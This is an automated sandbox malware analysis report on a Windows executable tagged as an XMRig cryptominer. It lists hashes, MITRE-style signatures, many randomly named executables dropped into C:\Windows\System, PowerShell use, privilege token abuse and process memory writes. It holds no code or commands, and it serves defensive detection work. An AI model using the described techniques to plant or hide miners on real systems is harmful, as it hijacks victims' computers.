Malware Analysis Report

2025-04-19 17:11

Sample ID 240523-zfv7dafe6v
Target 8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe
SHA256 7e2755070329ff873697242a5d09efac0dad9e7b1aeea1fef1aa8ed33794cde4
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7e2755070329ff873697242a5d09efac0dad9e7b1aeea1fef1aa8ed33794cde4

Threat Level: Known bad

The file 8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-23 20:40

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-23 20:40

Reported

2024-05-23 20:42

Platform

win7-20231129-en

Max time kernel

147s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\DOCaKvf.exe N/A
N/A N/A C:\Windows\System\bLCdRZK.exe N/A
N/A N/A C:\Windows\System\goZRcqI.exe N/A
N/A N/A C:\Windows\System\rydwIIT.exe N/A
N/A N/A C:\Windows\System\GvQQrrE.exe N/A
N/A N/A C:\Windows\System\fHZKZjx.exe N/A
N/A N/A C:\Windows\System\UNdjKdF.exe N/A
N/A N/A C:\Windows\System\ilFAkif.exe N/A
N/A N/A C:\Windows\System\GkOIZTx.exe N/A
N/A N/A C:\Windows\System\PviXJzn.exe N/A
N/A N/A C:\Windows\System\StxMTvc.exe N/A
N/A N/A C:\Windows\System\xIGeloP.exe N/A
N/A N/A C:\Windows\System\gbbVjtF.exe N/A
N/A N/A C:\Windows\System\vcmyOjQ.exe N/A
N/A N/A C:\Windows\System\ThbrLJt.exe N/A
N/A N/A C:\Windows\System\nEdxnNp.exe N/A
N/A N/A C:\Windows\System\CJyHorP.exe N/A
N/A N/A C:\Windows\System\dkBqWVh.exe N/A
N/A N/A C:\Windows\System\ZOUgimV.exe N/A
N/A N/A C:\Windows\System\CdeYIKP.exe N/A
N/A N/A C:\Windows\System\wSIGoJU.exe N/A
N/A N/A C:\Windows\System\btguKPq.exe N/A
N/A N/A C:\Windows\System\uuhHKza.exe N/A
N/A N/A C:\Windows\System\RhvekTL.exe N/A
N/A N/A C:\Windows\System\bOzepYI.exe N/A
N/A N/A C:\Windows\System\CeosUzc.exe N/A
N/A N/A C:\Windows\System\BtYGvZM.exe N/A
N/A N/A C:\Windows\System\EewyFxf.exe N/A
N/A N/A C:\Windows\System\tjYywdo.exe N/A
N/A N/A C:\Windows\System\dREvuDU.exe N/A
N/A N/A C:\Windows\System\VwtiHwr.exe N/A
N/A N/A C:\Windows\System\NwLpIij.exe N/A
N/A N/A C:\Windows\System\oKwuNUp.exe N/A
N/A N/A C:\Windows\System\drXrZRG.exe N/A
N/A N/A C:\Windows\System\vPycByZ.exe N/A
N/A N/A C:\Windows\System\QBlxqUM.exe N/A
N/A N/A C:\Windows\System\AMbHAmt.exe N/A
N/A N/A C:\Windows\System\zFtJTWS.exe N/A
N/A N/A C:\Windows\System\iltoLBB.exe N/A
N/A N/A C:\Windows\System\QTlwTkN.exe N/A
N/A N/A C:\Windows\System\oizrNoG.exe N/A
N/A N/A C:\Windows\System\BwbiUiE.exe N/A
N/A N/A C:\Windows\System\xmBDPGd.exe N/A
N/A N/A C:\Windows\System\pagvIlD.exe N/A
N/A N/A C:\Windows\System\tHuhOsp.exe N/A
N/A N/A C:\Windows\System\hHUbnLO.exe N/A
N/A N/A C:\Windows\System\yUmwMcy.exe N/A
N/A N/A C:\Windows\System\rSdhCAX.exe N/A
N/A N/A C:\Windows\System\wmifNow.exe N/A
N/A N/A C:\Windows\System\lQPZYiN.exe N/A
N/A N/A C:\Windows\System\kLEHJCa.exe N/A
N/A N/A C:\Windows\System\TwMiAEQ.exe N/A
N/A N/A C:\Windows\System\YfcRlPo.exe N/A
N/A N/A C:\Windows\System\MkAbTIu.exe N/A
N/A N/A C:\Windows\System\oLfPXuU.exe N/A
N/A N/A C:\Windows\System\ztofafl.exe N/A
N/A N/A C:\Windows\System\qPqkFRV.exe N/A
N/A N/A C:\Windows\System\OjKAMpl.exe N/A
N/A N/A C:\Windows\System\nRMkQIp.exe N/A
N/A N/A C:\Windows\System\jOhDmCp.exe N/A
N/A N/A C:\Windows\System\oyJOYSq.exe N/A
N/A N/A C:\Windows\System\bmDjpdp.exe N/A
N/A N/A C:\Windows\System\sFMjlNx.exe N/A
N/A N/A C:\Windows\System\jhdJMEX.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\kjlYvZp.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\SdfZQfw.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\qmRNCJD.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\LxwxzkH.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\RYVZqEE.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\iVMacNV.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\tCHDTuL.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZuSRrfv.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\xWXIBFi.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\VjbgNKd.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\MUdVsRj.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\YGmXFAp.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\JWjoCDc.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\KvHIYke.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\gYyUAFE.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\FWozBVh.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\Hkadsrl.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\QVUfTWw.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\bPPynVc.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\CwDxCIB.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\MftyPyw.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\wXzDbGF.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\tPmnfPn.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\shEkvrh.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\aUatVre.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\WDMzIxi.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\iBeNUNy.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\tplkmsd.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\JWmHVyE.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\KWgjsWD.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\CMPMpmQ.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\oywLzMm.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\MHLOQXT.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\OgMSqpp.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\dfwwzoV.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\SMgdocj.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\clgrOKG.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\LhJNXlw.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\ULFaLiI.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\cBcLjZJ.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\oxNlaKi.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\DNVGidA.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\JLqyPJo.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\sXyBmsM.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\mEBAdBK.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\DsDSnKi.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\jSjsvxQ.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\otLkAWx.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\LhNdbOz.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\KUNVjsw.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\lFfHRbI.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\gXrAYtv.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\EcnqBeH.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\ltJMXdX.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\miYmFPx.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\HctyEtd.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\thmFHRk.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\ruxoKHI.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\gpWXZiq.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\VbmWPSN.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\kIuwcVj.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\kpVpHmM.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\WBywuza.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\zEWUHwg.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1420 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\bLCdRZK.exe
PID 1420 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\bLCdRZK.exe
